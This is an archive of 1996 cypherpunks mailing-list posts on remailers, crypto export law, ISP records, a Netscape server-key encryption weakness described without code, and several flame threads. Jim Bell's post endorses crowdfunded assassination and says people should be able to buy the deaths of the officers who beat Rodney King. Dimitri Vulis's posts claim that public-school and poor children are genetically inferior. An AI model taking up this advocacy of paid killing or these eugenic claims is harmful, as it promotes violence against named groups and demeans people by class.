Date: Thu, 26 Sep 1996 09:56:59 +0800
To: cypherpunks@toad.com
Subject: Re: Winsock Remailer Ver 1.3 -- Help!
Message-ID: <199609251716.KAA24266@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

It could receive message but not remail. What could be the problem?
A sample of the Statistics Table is as follows:

Messages remailed      0
Messages discarded    3
Messages received    10

Other particulars are:

1) Pool set as 3 for light traffic
2) POP 3 working fine in other email applications.
3) Platform is Windows 3.1

Some Questions:

1) What should be the entries in the PGP Options dialogue box?
2) Do I have to create separate public and secret keyrings for 
the remailer?

Would apprecaite any help.

Makofi








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Thu, 26 Sep 1996 02:33:49 +0800
To: cypherpunks@toad.com
Subject: Re: WHO IS MAKING A MOCKERY OF WHOM?
Message-ID: <199609251426.HAA02190@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:55 PM 9/24/96 -0400, you wrote:
>At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:
>
>>C'punks,
>>Time for another informal poll.
>>
>>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
>>> What a joy to make a public mockery of Tim Mayo!
>>
>>Do list members think Anonymous' posts make a public mockery of
>>Tim May or Anonymous?  Let me know whose reputation you think 
>>is enhanced or tarnished by these posts.  I'll post a summary to 
>>the list in a week or two.  
>

I vote for Anonymous.

Also, it seems evident that some non-anonymous posters aka KTOM seem to 
understand how to *abuse*  our American freedom's but don't understand about
*responsible*  use.

Is this a deliberate attempt to damage this list or is it that some folk
just can't handle freedom?

M. J. Wohler





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 26 Sep 1996 03:36:04 +0800
To: jim bell <bdavis@thepoint.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609251433.AB02026@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Sep 96 at 5:59, Brian Davis wrote:

> I disagree that that will be the response, but you should be willing
> to allow one group of people to fight fire with fire.

But generally, it has been found a much better solution to fight fire
with water, and this is why I am not convinced of the ideological 
effectiveness of AP, although I don't doubt it's operationnal 
effectiveness at all.

I will take that sentence only slightly out-of-(specific)-context and
make a still pertinent remark about it:
  	
	This is *exactly* what Jim Bell, because of his opinions,
	envision to do with the AP system.


I find that absolutely hilarious!

jfa

Please reply by e-mail since I am not on Cypherpunks anymore.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Craig <webwarrior@infowar.com>
Date: Thu, 26 Sep 1996 04:52:20 +0800
To: news_from_wschwartau@infowar.com
Subject: No Subject
Message-ID: <10093730201704@infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject Line:    Infowar.Com  

>                           ---- D I S T R I B U T E  W I D E L Y ----
>
>WWW.InfoWar.Com is now open.
>
>The Definitive WWW site for Information Warfare & Information Security.
Created and managed by Winn Schwartau, Infowar.Com is designed to be "The"
place to be seen and be heard. Be seen. Be linked. 

Our goal:  To be a clearinghouse for all IW and InfoSec.  
>
>News. Infowar. Articles. Discussions. The Latest. Experts. Reviews. Opinion. 
>Civil Defense. Info-Security. Controversy. Privacy. Crypto. Chats.
List-servers. 
>Espionage. Military. C4I. Civil Defense. Global.
>
>Be seen. Be heard. Globally. Dynamic. New. Interactive.
>
>Yes, we're starting off small - manageable, but within a few short months look 
>at what we will have - on-line, bringing in tens of thousands of infosecurity 
>and information professionals. With your help, we'll be everything you want us 
>to be.
>
>* Timely Articles and Commentaries
>* Military/Government infowar treatises hot off the press
>* News that concerns you - As it Happens!
>* Infowar.Com List Server and Private Discussion Groups (to begin with) 
>     Infowar
>     Civil Defense
>     Terrorism
>     OSCINT
>     Hacking
>* Over 600MB of on-line utilities for the Net
>* On-Line Searches for Infowar and Infosec
>* The Infowar and Infosec Papers That Set Standards
>* Press Releases
>* What's New!?!
>* Audio Conferences
>* Video Conference
>* Specifications and Standards
>* Product and Company Listings - Worldwide
>* Contracts and Bids
>* Specifications
>* New papers and reports in all areas of Infowar
>* Extensive International participation
>* Compilations of the Best of Infowar and Infosec 
>* Hundreds of Security Utilities
>* Over 50 different encryption tools
>* User customized search engines for the entire site
>* Interactive Infowar-Chat lines
>* Who's Who of Infowar and Info-Sec
>* Gigs and gigs  . . . .
>* And more . . . stuff we won't even tell our mothers about . . . yet . . 
>
>We've always been interactive minded and we will count upon our users and 
>sponsors to guide us to provide better and better service. But, we will not 
>react to editorial extortion, either.  <G>  We have made our reputation on 
>brutal honesty and opinion and we will keep it. Might lose an advertiser from 
>time to time, but those is the breaks.
>
>We hope to see you there, contributing, interacting, discussing, commenting, 
>posting and contributing.  

Contributions:  betty@infowar.com   or   webwarrior@infowar.com
All submissions are gratefully accepted however, will be reviewed  for
relevance and content prior to being published.

IF - you hear something hot...see something hot.....   be a good Warrior and
call Betty at 813-367-7277  and leave a message that you have e-mailed the
info.  That way we can be sure to look for it and get it out on distribution.

You want to add some Warriors to our ListServ:  
   betty@infowar.com   or   webwarrior@infowar.com
>
>If you happen to be interested in Infowar.Com Sponsorship opportunities,
please give us a ring:    Our rates are very competetive.... and get on the
bandwagon so we can *lock-in the rate.
>
>Betty@Infowar.com
>or call
>813.367.7277
>
>Thank You
>
>Winn Schwartau 
>and the terrific folks at
>Infowar.Com

>		        Winn Schwartau - Interpact, Inc.
>		        Information Warfare and InfoSec
>		       V: 813.393.6600 / F: 813.393.6361
>			 Http://www.infowar.com
>			    Winn@infowar.com
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Steele <ceo@oss.net>
Date: Thu, 26 Sep 1996 04:43:24 +0800
To: Craig <webwarrior@infowar.com>
Subject: Re: your mail
In-Reply-To: <10093730201704@infowar.com>
Message-ID: <Pine.BSI.3.93.960925112225.11180N-100000@cais3.cais.com>
MIME-Version: 1.0
Content-Type: text/plain



Requiring people to call Betty to tell her they sent email
is very low rent and will discredit the site.  Recommend
you delete that element.  Like putting roller skates on a
horse!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nico Garcia <raoul@sunspot.tiac.net>
Date: Thu, 26 Sep 1996 08:15:54 +0800
To: rah@shipwright.com
Subject: Re: LACC: ISPs' information on users
In-Reply-To: <v03007801ae6df29ec7c8@[206.119.69.46]>
Message-ID: <199609251533.LAA28373@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Fortunately, if you take a look at USCC 18, I believe section 2701 but
could be off, the police in the US need a subpoena to get that data.
Not a warrant; a *subpoena*. One of the best things that came out of the 
Electronic Communications Privacy Act, IMHO.

				Nico Garcia
				raoul@tiac.net
<PGP is obviously a good idea: look at who objects to it.>
-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMklQx37Cg0E0WGE5AQGTigQAknpxlRZUTdqkXdA2alFVfghKIATkxCe9
MTZuDcma523mbClj6irSZ0EB7ttOq2gT1eC8FeIX0WlqEUu3ZeNFvkmR5uK9HxYd
JdaB3/lrHLGZNvqQ4H50aD0Zlf3ufTRjknJwDTFVBv31GlqJM1458k6IULeRLuMw
HrjkQPgZndQ=
=rL7X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 04:51:46 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <Pine.SOL.3.93.960925093100.13583B-100000@stiletto.acadian.net>
Message-ID: <oLiTuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering <pgf@acadian.net> writes:
> Without vouchers, you don't say anything about the intelligence of your
> test subjects; to a _very_ large degree, intelligence isn't genetic. Or

That's the political correct thing to say, but do you have any scientific
evidence to support this claim?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 11:09:42 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Public schools
Message-ID: <ZoiTuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jay Gairson <erp@digiforest.com> writes:

> First off, what does this have to do with cryptography?  or anything 
> cypher for that matter?

Nothing. Neither does most other stuff posted to this list.

> On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > > > U.S. public school system is darwinian evolution in action. Parents who
> > > > afford to send their kids to private schools, do so. Parents who send t
> > > > kids to public schools deserve to have their offsprings fucked up, ment
> > > > and phsyically, to improve the species' gene pool.
> 
> So, basically your saying, since my parents cannot afford to pay for a 
> private school for me, we are genetically inferior to those who can?

In general, on the average, yes.

> Because hate tell ya, but I've ran into some major idiots that go to 
> private schools.  Also to consider that from the school I go to, last 
> year we had two perfect sat scores (no problems missed).

Oh yes - I've seen idiots at private schools and I've seen smart kids at
public schools. They're exceptions.

Judging from your abuse of the English language, you're not.

The cirricula at public schools and the SAT requirements are pretty
lame, so any kid willing to spend enough time on them can become a
straight A student and feel good about himself/herself. I'm not impressed.

> > > But the cutoff is often whether the parents can afford to send their kids
> > > to private school, not whether or not they're genetically superior.
> > 
> > You must have attended a public school if you don't understand that geentic
> > superiority leads to economic success.  My older kid goes to a private scho
> > The parents are obviously genetically superior to public school parents.
> 
> I am assuming from what you have said in that statement, that you believe 
> since he may have gone to a public school, it has made him have the 
> opinion he does?

Opinions change.  His snotty attitude toward learning, his propensity to
wallow in his stupidity and ignorance the way a pig wallows in its own
excrement is a trait commonly acquired in the U.S. public school system.

> Also, in your statement that your older kid goes to a private school, and 
> that the parents are obviously genetically superior to public school 
> parents.  You seem to be saying that YOU are genetically superior to my 
> parents?

I believe myself to be genetically superior to the vast majority of the
population. Not knowing much about your parents, other than they can't
afford to send you to a better school, I assume that they're part of
this vast majority.

(Make it both intellectually and physically superior. :-)

> Another thing to consider here is, from this line of statements, you are 
> saying that children who have parents who made it well in, let us say the 
> movie buisness (or even drug buisness), and then send there children to 
> public schools, are genetically superior because they can act (lie) 
> better than my parents.  For if this is so, that must mean that my aunt 
> is genetically superior to my mother (who is a teacher at a private 
> school, but she did not go to a private school) and to her parents, for 
> she is making more money, and if she ever has children they will be 
> genetically superior to me, because they will have more money?

In general, on the average, yes.  I believe that being able to afford a
good private school for one's kids is a trait correlated to desirable
traits, some of which are inherited by the kids who benefit from the
better education.

That's eugenics in action.

> > Push vouchers. What's the cryptorelevance of your comments, anyway?
> > 
> 
> Umm, where you not the one that started this conversation?

Nope.

> > No, on the contrary, sending poor kids to good schools on scholarships
> > does not improve their genes. They tend to become drug dealers.
> 
> Hate to inform you on this but, it is more often than not the children 
> sent by there rich mama and papa to school, that end up on drugs or as 
> drug dealers, than the ones that start out with scholarships (For the 
> ones with scholarships have more to loose, than the ones with the rich 
> mama and papa, for the rich mama and papa can afford the big expensive 
> lawyer.).  Just look at the studies and such done on this type of area.  

Can you site any such studies? They certainly contradict what I know
about this area, and I consider myself pretty well-informed.

> Also you have to consider that generally the ones that end up as drug 
> dealers, are the children who have parents that where drug dealers and 
> such or had experience in such, or just had parents who didn't care what 

That's pretty much what I said. Other disciplinary problems (poor
attendance, talking back to teachers, weird dress, sex, etc) also
tend to be associated with the poor kids admitted on scholarships.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 26 Sep 1996 09:43:36 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <3248DE04.5363@gte.net>
Message-ID: <Pine.SUN.3.91.960925120045.1328G-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Dale Thorn wrote:
> 
> I understood the intent of AP was to take powers the government is 
> already exercising (unconstitutionally), and merely transfer some of 
> them to the people, as it were.
> 
> Isn't this true democracy (if a rather perverse kind)?

Not really- however, no matter what it is, it isn't a Libertarian scheme, 
as libertarian philosophy holds that those powers are the defining 
characteristic of goverment; AP doesn't abolish governments, it creates 
lots of little governments which don't even have to pretend to be 
democracies.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 26 Sep 1996 06:44:10 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: [Long] How to break Netscape's server key encryption
In-Reply-To: <84366802803808@cs26.cs.auckland.ac.nz>
Message-ID: <3249833B.3EEE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


pgut001@cs.auckland.ac.nz wrote:
> 
> The Netscape server key format is very susceptible to both a dictionary attack
> and to keystream recovery.  It uses the PKCS #8 format for private keys, which
> provides a large amount of known plaintext at the start of the data, in
> combination with RC4 without any form of IV or other preprocessing (even though
> PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
> you can recover the first 100-odd bytes of key stream with a simple XOR (the
> same stupid mistake Microsoft made with their .PWL files).  This means two
> things:
> 
> 1. It's very simple to write a program to perform a dictionary attack on the
>    server key (it took me about half an hour using cryptlib, and another half
>    hour to rip the appropriate code out of cryptlib to create a standalone
>    program).
> 
> 2. The recovered key stream from the encrypted server key can be used to
>    decrypt any other resource encrypted with the server password, *without
>    knowing the password*.  This is because there's enough known plaintext
>    (ASN.1 objects, object identifiers, and public key components) at the start
>    of the encrypted data to recover large quantities of key stream.

Peter,
  The attack you describe is indeed possible with the Netscape Commerce Server
1.x.  However current Netscape products, such as Navigator, Enterprise Server,
and FastTrack Server, have improved private key encryption that prevents
these types of attacks.  Note that the old key handling code is of the
same vintage as the random number seed code that was shown to be weak last
year (from before I got here).  I recognized this particular problem
quite some time ago, and fixed all of the products that were then in
development.

  If someone is running the old Commerce Server, and is not confident
that the file system of their server machine can not be accessed by
attackers, I would recommend that they upgrade to the FastTrack or
Enterprise servers.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 26 Sep 1996 06:14:38 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.960925121324.22297B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


At today's SAFE crypto hearing in the House, Congressperns quizzed 
Gorelick about what the fuck the administration is trying to do by having 
their lackies attach amendments to the omnibus export act that would 
prevent judicial review of Commerce Dept export control decisions. It's 
already cleared the House.

"no court shall have power or jurisdiction to review any such decision by 
an action in the nature of mandamus or otherwise."

Bastards.

-Declan


On Wed, 25 Sep 1996, Peter D. Junger wrote:

> Greg Broiles writes in a most informative posting:
> 
> : And that's what the ITAR is - a body of administrative law developed by the
> : executive branch pursuant to a grant of power from Congress. (e.g., 22 USC
> : 2778(a)(1), ". . . The President is authorized to designate those items
> : which shall be considered as defense articles and defense services for the
> : purposes of this section and to promulgate regulations for the import and
> : export of such articles and services. The items so designated shall
> : constitute the United States Munitions List.") It is subject to review by
> : the courts just like the product of Congress itself; and an agency can't do
> : something Congress can't do, like write an unconstitutional law.
> 
> It should be added though that most administrative regulations are
> subject to judicial review by courts to make sure that they comply with
> the law passed by Congress.  The ITAR, on the other hand, are not
> subject to this sort of review and can only be challenged in the courts
> on Constitutional grounds.
> 
> --
> Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
> Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
>                      URL:  http://samsara.law.cwru.edu
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 26 Sep 1996 05:12:09 +0800
To: cypherpunks@toad.com
Subject: re: Rutgers DIMACS Dist. Trust Workshop
Message-ID: <32496D93.7885@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone who's registered for next week's conference at Rutgers
gotten any sort of confirmation?  I've been trying for days to do
so, and though I've sent mail and called I haven't managed to get
hold of anyone who can tell me anything.  (And now they seem to not
answer the phone at all; I think they got a bigger response than
they expected.)
-- 
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 15:14:17 +0800
To: cypherpunks@toad.com
Subject: Re: Taking crypto out of the U.S.
Message-ID: <ae6f3ef70d02100409eb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 PM 9/25/96, Igor Chudov @ home wrote:
>> >> Soon I am going to be going overseas to Japan, and I want to take
>> >> my notebook with me so I can keep up with everything, however, I have
>> >> encrypted my hard drive and usually encrypt my mail.  Is this in
>> >> violation of the ITAR to keep everything the same when I go over?
>
>Gentlemen, us customs does not give shit about what you take out
>on your diskettes.
>
>When I went to Russia recenty, I took PGP for DOS, and no one gave
>me any problem.

I initially responded to the first questioner with a simple "No." (Sent
privately.) This answer, because of several points:

- encrypted data, his hypo, is not illegal to export under _any_ circumstances

- the "personal use" exemption

- the Matt Blaze example, where it was obvious U.S. Customs was basically
neither interested in nor set up to process "crypto export" situations

- the basic fact that U.S. Customs _rarely_ does inspections of outgoing stuff

As I've said before, on a trip to Monte Carlo in early '95, I carried out a
bunch of magneto-optical disks, containing more than a gigabyte of stuff,
including a bunch of crypto products, etc.

Needless to say, I boarded my Air France flight without a single glance
from U.S. Customs. They were nowhere in sight, in fact, on the outgoing
side. I could have had suitcases full of cash, briefcases full of stock
certificates, and 100 gigabytes of software.

(A college friend of mine is married to a Brooklyn DA. One of the cases she
described to me involved prosecuting a guy for smuggling U.S. currency out
of the country. She hinted that the only reason he was searched as he left
the country was because of a related case.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 13:38:27 +0800
To: cypherpunks@toad.com
Subject: "Confessing to a felony"
Message-ID: <ae6f45b800021004a06e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 AM 9/26/96, Black Unicorn wrote:
>On Wed, 25 Sep 1996, Igor Chudov @ home wrote:
>
>> > >> Soon I am going to be going overseas to Japan, and I want to take
>> > >> my notebook with me so I can keep up with everything, however, I have
>> > >> encrypted my hard drive and usually encrypt my mail.  Is this in
>> > >> violation of the ITAR to keep everything the same when I go over?
>>
>> Gentlemen, us customs does not give shit about what you take out
>> on your diskettes.
>>
>> When I went to Russia recenty, I took PGP for DOS, and no one gave
>> me any problem.
>>
>> IANAL
>
>Obviously not, you've just confessed to a felony.

So?

"Confessing to a felony" is meaningless, as I understand things. While BU
is a lawyer, and I am not, I maintain "confessing to a felony" is
meaningless without several necessary factors:

a. interest by law enforcement that a crime has been committed and needs to
be prosecuted

b. evidence that the "confession" can be backed up by other evidence

c. common sense

Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were
to have "confessed to a felony" (for example, saying a bad word on a forum
where minors might be present, under the CDA, and before it was put on
semi-hold), his colleagues would just have snickered, thinking him crazy.

As to the felony status of taking PGP to Russia, I think it's not a felony.
The "personal use" exemption in the ITARs certainly makes taking PGP to
_Western_ Europe an OK thing. Whether Russia is still considered to be
worthy of an "exemption to the exemption," as it were, is unclear to me.

Mostly, I think U.S. Customs doesn't care.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Norseen <jnorseen@gelac.mar.lmco.com>
Date: Thu, 26 Sep 1996 09:24:57 +0800
To: Craig <ceo@oss.net>
Subject: Re: your mail
Message-ID: <Chameleon.960925131344.jnorseen@t-rex.mar.lmco.com>
MIME-Version: 1.0
Content-Type: text/plain


robert, good to hear from you again...what else is new and exciting on your front...norseen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Thu, 26 Sep 1996 08:50:23 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Dyson on anonymity (in WSJ article on our challenge to GA net law)
Message-ID: <199609252017.NAA24875@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


FYI:


[...]
   Esther Dyson, president of high-tech publisher EDventure
   Holdings Inc. and chairwoman of the Electronic Frontier
   Foundation, a high-tech civil liberties organization that
   is a co-plaintiff in the lawsuit, calls the Georgia law
   "brain-damaged and unenforceable," and adds: "How are they
   going to stop people from using fake names? Anonymity
   shouldn't be a crime. Committing crimes should be a crime."
[...]


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Humble <deeb@x.org>
Date: Thu, 26 Sep 1996 09:03:48 +0800
To: tcmay@got.net
Subject: Re: ISPs' information on users
In-Reply-To: <ae6df1260502100417f8@[207.167.93.63]>
Message-ID: <9609251720.AA20644@hydra.cde.x.org>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) sez:
> Could ISPs in the UlS. be compelled to report on the browsing and
> net surfing habits of their customer base?

Such as when the police/feds/Big Brother's Helpers come in, seize
every piece of computer equipment on the site for "investigation", put
it in a warehouse for 2 years so they can read everything and save
whatever appeals to them in their private databases?  As Steve Jackson
Games found out, it can be slow and expensive to get the "evidence"
back and the satisfaction of watching a judge ream BBH is no guarantee
that such shenanigans will cease.

I hope the ISP used strong encryption on all their disks and tapes.
Sadly, I have no idea how to make sure an ISP I use does that
properly or how to get an exhaustive list of what kind of records they
keep.

tcmay@got.net (Timothy C. May) sez:
> To make this clear, I don't mean in a specific criminal case, where
> the records are searchable under a warrant. I mean a blanket order
> that all ISPs compile and forward records.

How many pieces of thread does it take to make a blanket?

Stephen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Prof. L. P. Levine" <levine@blatz.cs.uwm.edu>
Date: Thu, 26 Sep 1996 10:33:28 +0800
To: jnorseen@gelac.mar.lmco.com (John Norseen)
Subject: Re: your mail
In-Reply-To: <Chameleon.960925131344.jnorseen@t-rex.mar.lmco.com>
Message-ID: <199609251822.NAA18129@blatz.cs.uwm.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am not sure why comp-privacy@uwm.edu should be a part of this
discussion. please take me out of this.

 ---------------------------------+-----------------------------------------
Leonard P. Levine                 | Moderator of:     Computer Privacy Digest
Professor of Computer Science     |                  and comp.society.privacy
University of Wisconsin-Milwaukee | Post:                comp-privacy@uwm.edu
Box 784, Milwaukee WI 53201       | Information: comp-privacy-request@uwm.edu
                                  | Gopher:                 gopher.cs.uwm.edu 
levine@cs.uwm.edu                 | URL:  http:/www.uwm.edu/org/comp-privacy/
 ---------------------------------+-----------------------------------------


>robert, good to hear from you again...what else is new and exciting
on your front...norseen >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 26 Sep 1996 08:12:32 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: SAY WHAT? [Assassination NOISE]
Message-ID: <199609252034.NAA23641@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 9/25/96 -0700, Bill Stewart wrote:
>Bell, like X, is proposing mechanism without built-in policy, 
>as well as suggesting some potential policy implementations.  If you use 
>the mechanism to sponsor assassination of people who have initiated force
>against you, you're only using retaliatory force, not initiating it.

Funny that Simon didn't see that...

>On the other hand, the mechanism also can be used against people who
>haven't initiated force against the sponsor - even against politicians
>who have refused to get the country into misguided but popular wars
>or judges who have refused to convict innocent but wrong-colored defendants.

That's a too-superficial interpretation.  If AP were operating, it would be 
unnecessary to "get the country into misguided but popular wars" because 
anybody who wanted to war with some external enemy need merely kill him via 
AP, by individual donation.  There would be no legislature to make the war 
decision, and no need for any such decision.  War as we have known it (a 
collective decision that is binding on all citizens, whether or not they 
approve) would simply not exist.   There would be no mechanism to force 
other people into a war on your side, other than rhetorical arguments.   
Attempting to do so by force would merely make more enemies.  

As for "judges who have refused to convict innocent but wrong-colored 
defendants"?  I think that's an unfair and misleading "problem."  Much of 
the problem of bias and discrimination in this country is caused by the fact 
that these factors have been institutionalized BY GOVERNMENT.  Trace it back 
just a little, and you'll discover that the "innocent but wrong-colored 
defendants" were arrested and charged BY GOVERNMENT in a display of bias.  
At best, that courageous judge is merely ceasing, in one particular incident 
and too late, an episode of bias which shouldn't even have been started in 
the first place.  Is this "good"?  Not really. It's just "not quite as bad." 
  There's still the underlying problem which will repeat ad infinitum.  Why 
depend on a judge to do this?  Why not fix the bias before the defendant 
gets to court?

I look at it this way:  Why shouldn't the black community (and any outraged 
whites, as well...) have been able to purchase the deaths of all of the LAPD 
officers who beat Rodney King, INCLUDING the ones who stood around and 
watched it happen?  I claim that in a society where they could do this, such 
a beating simply would never have happened, because no cop would have dared 
to take the risk that a camera would be nearby.  In other words, the problem 
would have been solved before it started. 

The quickest response to this is that "pretty soon, you won't have any more 
cops."  But no, that's not true.  It _is_ true that the thugs will no longer 
want to become/stay as cops, so that'll be a loss for the good.  More 
likely, cops will simply stop doing those things that will end up offending 
a substantial fraction of the population, like beating a carload illegal 
immigrants that they have stopped after a car chase.   

>Like democracy, it's a really terrible system, and like democracy,
>there are some alternatives that aren't worse :-)  Maybe even democracy.
>It's at least as appalling an idea as government.
>
>If it does catch on, and I suspect that the technology will certainly
>make it possible, I hope that most of the public will have enough sense 
>and decency not to pay for murdering people who don't deserve it,
>so assassins will find more of a market for killing people who do,
>and that the lower-paid assassins who kill undeserving people will
>be less competent and get caught like most stupid bank robbers do.
>
>But there are enough Drug-War-Loving Americans that I doubt it.

The de-facto drug war won't end instantly after the adoption of AP, but it 
will be pretty quick.  Instead of today, when every citizen is forced 
through taxation to support the Drug War, this will probably drop to 25% 
voluntary contributions or less post AP.  It's pretty hard to get enthused 
about a victimless crime, and likewise it's hard to enforce such rules, so 
people's donations won't match the pre-AP funding.  

Classic drug-warriors won't dare spread any of their propaganda; people's 
memories will still be fresh on the pre-AP abuses, so the Bennetts and the 
Rangels will either be silent or dead, or effusive with apology for their 
prior behavior.

Further, the dramatic drop in the prices of currently-illegal drugs will 
translate into a similarly large drop in crimes to pay for those drugs, an 
improvement that everybody will notice.  


>And attila replied
>>        all very true.  but I will defend Jim Bell's rights to propose
>>    them, even if Bell is more than a few cards short of a full deck.
>
>Sure, he's got the right to, and if I run a remailer again he's welcome
>to use it to discuss AP (though not to propose assassinations....)
>Doesn't mean I want to encourage this sort of thing, though.
>Remailers can damn well afford to be choosy, and I'll bet
>5 zorkmids that the first person to use my remailer for assassination
>doesn't last a month. (Oh, wait...)

"Your bet has been duly recorded, sir."  <beep!>


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 13:47:51 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
Message-ID: <ae6f4b2101021004e5f9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 9/25/96, Jay Gairson wrote:

>> A minor point: An 800 SAT or Achievement score does _not_ mean "no problems
>> missed." There is some threshold for the percentage of right answers, which
>> varies from year to year and from test to test, above which the score is
>> marked "800." Don't ask me why they do this. (*)
>
>They did it because, the American students, where scoring worse than the
>Japanese students.  And the with the 1600 they got a copy of the
>questiosn and answers, and the questions they missed, they didn't miss any.
>So...

Nonsense. Japanese students were not taking the CEEB and SAT tests in the
1950s, when the test methodologies were established. (As a point of fact,
the Japanese have their own grueling exams, which bear no resemblance to
the CEEB and SAT tests.) Nor were the number of Japanese-American students
taking the test sufficiently plentiful in the 1950s and 60s to affect the
methodology.

So, this is your chance to present your evidence that the scoring
